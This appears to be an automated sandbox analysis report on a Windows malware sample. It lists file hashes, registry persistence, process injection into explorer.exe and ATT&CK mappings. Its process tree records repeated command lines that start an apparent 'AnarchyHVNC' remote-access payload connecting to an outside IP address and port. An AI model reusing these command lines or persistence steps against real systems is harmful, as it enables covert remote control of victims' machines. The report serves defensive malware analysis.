70446563b6d657b1a27f5bd7a0aa8d99d757b0589bac1d9c72b31fa9144d3f0d

Analysis

max time kernel
127s
max time network
121s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
28/06/2024, 11:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
Size

61KB
MD5

a8357c7929ecd45b428c5622641a6304
SHA1

e4a98fed6e51518bdad179e845924798a39d4086
SHA256

70446563b6d657b1a27f5bd7a0aa8d99d757b0589bac1d9c72b31fa9144d3f0d
SHA512

72530b13271b27b93e9d033ce05fbb40fe6a0e7692deaf41d6938bce3fd1f02103e1cc7c551638b46673d3a8eec3c132ad16cc2f9ddc3a06f289bdb5c941a253
SSDEEP

1536:caRmGCCb59dI9Jm82bB65VA85FG/GF9WN:5RlCCVM2gA/GGN

Score

8^/10

persistence

Malware Config

Signatures

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded = "C:\\Users\\Admin\\AppData\\Local\\Temp\\17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe"	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe
Token: SeShutdownPrivilege	2328	explorer.exe

Suspicious use of FindShellTrayWindow 23 IoCs

pid	Process
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe

Suspicious use of SendNotifyMessage 15 IoCs

pid	Process
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe
2328	explorer.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2328	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	28
PID 2220 wrote to memory of 2328	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	28
PID 2220 wrote to memory of 2328	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	28
PID 2328 wrote to memory of 2564	2328	explorer.exe	29
PID 2328 wrote to memory of 2564	2328	explorer.exe	29
PID 2328 wrote to memory of 2564	2328	explorer.exe	29
PID 2220 wrote to memory of 2628	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	30
PID 2220 wrote to memory of 2628	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	30
PID 2220 wrote to memory of 2628	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	30
PID 2220 wrote to memory of 2628	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	30
PID 2220 wrote to memory of 2080	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	31
PID 2220 wrote to memory of 2080	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	31
PID 2220 wrote to memory of 2080	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	31
PID 2220 wrote to memory of 2080	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	31
PID 2220 wrote to memory of 2660	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	32
PID 2220 wrote to memory of 2660	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	32
PID 2220 wrote to memory of 2660	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	32
PID 2220 wrote to memory of 2660	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	32
PID 2220 wrote to memory of 2500	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	33
PID 2220 wrote to memory of 2500	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	33
PID 2220 wrote to memory of 2500	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	33
PID 2220 wrote to memory of 2500	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	33
PID 2220 wrote to memory of 2496	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	34
PID 2220 wrote to memory of 2496	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	34
PID 2220 wrote to memory of 2496	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	34
PID 2220 wrote to memory of 2496	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	34
PID 2220 wrote to memory of 2404	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	35
PID 2220 wrote to memory of 2404	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	35
PID 2220 wrote to memory of 2404	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	35
PID 2220 wrote to memory of 2404	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	35
PID 2220 wrote to memory of 2636	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	36
PID 2220 wrote to memory of 2636	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	36
PID 2220 wrote to memory of 2636	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	36
PID 2220 wrote to memory of 2636	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	36
PID 2220 wrote to memory of 2644	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	37
PID 2220 wrote to memory of 2644	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	37
PID 2220 wrote to memory of 2644	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	37
PID 2220 wrote to memory of 2644	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	37
PID 2220 wrote to memory of 2516	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	38
PID 2220 wrote to memory of 2516	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	38
PID 2220 wrote to memory of 2516	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	38
PID 2220 wrote to memory of 2516	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	38
PID 2220 wrote to memory of 2584	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	39
PID 2220 wrote to memory of 2584	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	39
PID 2220 wrote to memory of 2584	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	39
PID 2220 wrote to memory of 2584	2220	17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe	39

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe
"C:\Users\Admin\AppData\Local\Temp\17195740248fd860676318bca54f00df009ba138bae6bd52ea69786ca4c637466974f4d340674.dat-decoded.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:2564
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2628
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2080
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2660
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2500
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2496
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2404
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2636
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2644
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2516
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 45.40.96.164 1336 9crwXP
  2⤵
  PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2220-0-0x000007FEF5253000-0x000007FEF5254000-memory.dmp

Filesize
4KB

Download
memory/2220-1-0x0000000000D40000-0x0000000000D56000-memory.dmp

Filesize
88KB

Download
memory/2220-2-0x000007FEF5250000-0x000007FEF5C3C000-memory.dmp

Filesize
9.9MB

Download
memory/2220-3-0x000007FEF5250000-0x000007FEF5C3C000-memory.dmp

Filesize
9.9MB

Download
memory/2328-7-0x0000000003C40000-0x0000000003C50000-memory.dmp

Filesize
64KB

Download